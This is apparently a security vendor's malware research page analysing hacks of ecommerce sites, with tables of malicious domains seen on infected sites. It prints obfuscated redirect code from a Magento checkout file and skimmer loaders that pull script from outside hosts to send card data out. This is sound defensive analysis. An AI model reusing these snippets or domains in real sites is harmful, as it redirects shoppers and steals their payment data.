Home Testimonials Company Support 1–888–873–0817
PRICING SUPPORT LOGIN
Home Notes Malware Signatures About

Sucuri Research Labs

The home of our Security Operations Group, including our Malware Research and Incident Response teams.

We see a strong trend in hacking ecommerce sites in order to hijack payment process and steal customers credit card details. During the last couple of years, we wrote multiple times about attacks that target Magento, OpenCart, PrestaShop, Woo Commerce and other ecommerce platforms.

Recently we found one more proof of increased attention to ecommerce sites from hackers. On one hacked WordPress site, among other uploaded backdoors, we found quite a big script (>600 lines of code) script whose only purpose was to scan the compromised server for online shop sites

Read More ...

The checkout process is one of the most important steps for any e-commerce business. The user experience during this process will set the tone for the entire interaction and fortunately lead to a successful sale. Because of that fact, attackers have been targeting Magento installations in order to steal sensitive information (credit card data, paypal logins) and in this case, promote websites for their monetary gains.

During our malware investigation process, we found an interesting piece of code redirecting users during the checkout process to a page not intended by the website owner. After selecting the products and clicking on the “Proceed to checkout” the user was redirected to: hxxp://bestdealsweek[.]com

The malicious code was located inside "/js/varien/accordion.js" and here is the content (obfuscated):

var x="\'%kVg\'%YZaVn\'%(9\'%&%%(7%6\'%\'%hZiI^bZdji\'-\'\'YdXjbZci#adXVi^dc#]gZ[(9\',]iie(6$$WZhiYZVahlZZ`#Xdb\',\'\'\'8\'%YZaVn\'.(7",y="",w="",z;z=x['length'];
for(i=0;i<z;i++){y+=String['fromCharCode'](x['charCodeAt'](i)+11) }w=this['unescape'](y);this['eval'](w);

This particular file in addition to "/skin/frontend/base/default/js/opcheckout.js" create a Javascript Layer responsible for submitting step data to the checkout controller and interpreting controller responses to update the content of the checkout steps. This layer allows the checkout process to be completed without the browser having to load every request in a new page.

This is how the accordion.js was injected into the One Page checkout:

<script type="text/javascript"src="hxxps://domain/js/varien/accordion.js"></script> 

After decoding it, we can see the redirect:

var delay = 100;
setTimeout("document.localtion.href='hxxp://bestdealsweek.com'",delay);

This is one of the many injection techniques attackers have been using against Magento e-commerce sites to make a profit. To reduce the risks of such injections, we recommend keeping all software updated (themes, plugins, core files), using a Website Application Firewall, having a File Integrity Monitoring system to detect file modifications and taking regular backups.

We recently wrote about a Drupal black-hat SEO hack that among other things redirected users coming from Google to botscache[.]com site. It hijacked the bootstrapping process via the session_inc variable in database, then made Drupal load a malicious file from the global /tmp directory instead of the standard includes/session.inc file.

This malware evolves and we have found its new variation. Again, the only malicious code that could be found within the site structure was just a file name. This time it was in the system table and it was the name of the file to load a Drupal module from. However, the file had a .jpg extension and it was loaded from a directory that belonged to a different website under the same server account ../otherwebsite/sites/default/files/slides/Search.jpg.

Taking a look at that Search.jpg file we can see the following code:

Read More ...

Malware uses encryption, obfuscation and other tricks to prevent its detection so that the compromised sites stay infected for as long as possible. Quite often it’s not easy to spot a malicious code even if you see it, especially if you are not a professional programmer or security analysts.

But sometimes, the malware is very straightforward. For example, we found this backdoor installer in file called robots.php in one WordPress theme. It doesn’t use any encryption, has properly indented code and very clear descriptive variable name and comments. You shouldn’t think twice when you see such a code:

Read More ...

Lately we’ve been analysing multiple credit card stealers for Magento. We are seeing an increase trend there as attackers can more easily monetize a compromised e-commerce site compared to one without credit card data.

This new variation the CC stealer isn’t injected directly into the website but loaded from an external source. Loading the code from another source allows the attacker to perform any modifications in the malware source code without the need of “reinfecting” the site.

Here is a snippet of the code that we found inside Magento's /js/lib/ccard.js

...
<!-- Google Code for Remarketing Tag -->
if((new RegExp('onepage|checkout|onestep|firecheckout')).test(window.location))
{document.write('<script src="hxxps://jquery -cdn .top/mage .js"></script>')};
<!-- Google Code for Remarketing Tag -->

Basically this javascript acts like a man-in-the-middle between the user and the checkout process/page and whenever a credit card information is provided, it allows the original processing from the CMS but at the same time it forwards the data to a malicious domain at hxxps://jquery-cdn . top/ mag.php.

We also found a slightly different version of the malicious code inside /js/scriptaculous/effects.js:

if((new RegExp('onepage|checkout|onestep|fircheckout')).test(window.location)) {document.write('>tpircs/<>"sj.egam/ue.todstats//:spxxh"=crs tpircs<'.split("").reverse().join(""))}

Putting the code in a readable format we get:

if ((new RegExp('onepage|checkout|onestep|firecheckout')).test(window.location)) {
	document.write('<script src="hxxps:// statsdot. eu/mage.js"></script>)
}

In this case, the script uses the domain hxxps:// statsdot. eu to load the javascript and it sends the credit card data over to hxxps://statsdot .eu /mag.php

Interesting point about these domains is that attackers are sending the stolen information through secure channels (https). And, even though the credit card information isn’t processed directly at your shop, it’s very important to ensure that your website is updated and has the latest patches installed.

Moreover, in order to detect, mitigate and prevent such issues from happening, we also recommend having a Website Application Firewall (WAF) in place, keeping regular backups and using a File Integrity Monitoring tool to ensure the integrity of your file system.

Latest malware entries

Hidden iframes

Latest hidden iframes our scanner have identified on compromised web sites.

# of sites infectedTypeMalware / Domains
16iframehttp://www.2nf.com.vn/templates/beez/images/jpg.php
11iframehttp://ewktvw.hopto.org/wordpress/?ARX8
10iframehttp://jrdzow.ddnsking.com/wordpress/?bf7N
5iframehttp://vlaeaoyvr.hopto.org/wordpress/?ARX8
4iframehttp://saqfhdxsu.ddnsking.com/wordpress/?ARX8
4iframehttp://kuetbdvb.hopto.org/wordpress/?ARX8
3iframehttp://vlkgvcdyj.hopto.org/wordpress/?ARX8
2iframehttp://vkeexfuv.hopto.org/wordpress/?ARX8
2iframehttp://rqbfqeaov.hopto.org/wordpress/?ARX8
1iframehttp://gcqzwh.ddnsking.com/wordpress/?ARX8
Limited view... Only the top entries being displayed.

Conditional redirections

Conditional redirections we have detected (based on user agents or referers).

# of sites infectedTypeMalware / Domains
24redirectionshttp://mmasoft.ru/indigo?5
10redirectionshttp://go60.ru
8redirectionshttp://vcminden.de/mzmd.html?h=1614558
7redirectionshttp://tds.another-xxx-clips.biz/go.php?sid=1
7redirectionshttp://default7.com
5redirectionshttp://traf-extractor.ru
5redirectionshttp://luxurytds.com/go.php?sid=1
4redirectionshttp://mmasoft.ru/indigo?5
3redirectionshttp://inet-poisk.ru/go.php?sid=1
3redirectionshttp://cloud-security.ru
2redirectionshttp://totallpuss.in/
2redirectionshttp://tegxejiq.ru/count28.php
2redirectionshttp://sextgpgalleriesfree.biz/s/in.cgi?7
2redirectionshttp://pornofund.com/html/in.cgi?6
1redirectionshttp://www.pornogora.ru/
1redirectionshttp://ww1.tubexcite.com/?folio=9POGF6H4I
1redirectionshttp://ww1.805jetski.com/?folio=9POGF6H4I
1redirectionshttp://ww1.4sters.com/?folio=9POGF6H4I
1redirectionshttp://ww1.021reg.com/?folio=9POGF6H4I
1redirectionshttp://search-world.biz/?folio=9PO6Z3MVF
Limited view... Only the top entries being displayed.

Spammers

Latest spammers we have detected sending comment, forum or SEO spam.

# of sites infectedTypeMalware / Domains
20spammerhttp://123livesex.com/,forumspam,2014-01
20spammerhttp://20min.ch,forumspam,2014-01
20spammerhttp://90210daily.com/,forumspam,2014-01
20spammerhttp://EzAdBlaster.com,forumspam,2014-01
20spammerhttp://absolutefringe.com,forumspam,2014-01
20spammerhttp://adaptfunrun.org/,forumspam,2014-01
20spammerhttp://andresmarcossanchez.com/MichaelKors/ ,forumspam,2014-01
20spammerhttp://appliancelandinc.com/,forumspam,2014-01
20spammerhttp://audiobookkeeper.ru/,forumspam,2014-01
20spammerhttp://australiainternetsearch.com/,forumspam,2014-01
20spammerhttp://autism.sedl.org/index.php/about-us,forumspam,2014-01
20spammerhttp://axanaxplease.com/,forumspam,2014-01
20spammerhttp://ayurvedatradicional.com/wordpress/ ,forumspam,2014-01
20spammerhttp://azezhomeloans.com/body.html,forumspam,2014-01
20spammerhttp://baltimorecomiccon.com/sponsors/,forumspam,2014-01
20spammerhttp://bashkiaprrenjas.com/,forumspam,2014-01
20spammerhttp://bellezzaamica.it/Moncler-Sale-With-Free-Shipping.html,forumspam,2014-01
20spammerhttp://birdsofstkittsnevis.com/files/,forumspam,2014-01
20spammerhttp://bmaphoenix.org/young-professionals/,forumspam,2014-01
20spammerhttp://bradblaze.com.au/,forumspam,2014-01
Limited view... Only the top entries being displayed.

Encoded javascript

Encoded javascript (redirecting to blackhole and other exploit kits) or to build a remote call.

# of sites infectedTypeMalware / Domains
11javascripthttp://trip11209.cz.cc/js/jquery.min.php
10javascripthttp://remontindom.com.ua/wad": var s="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00sfnpoujoepn/d...
3javascripthttp://momhand.ru:8080: this.Tm="Tm";try {var hsa='hs'} catch(hsa){};this.a=26381;this.a+=105;v...
1javascripthttp://trip11209.cz.cc/js/jquery.min.php: if (typeof(redef_colors)=="undefined") { var div_colo...
129javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
75javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
67javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
60javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
57javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
54javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
50javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
50javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
49javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
49javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
47javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
47javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
40javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
39javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
36javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
36javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
Limited view... Only the top entries being displayed.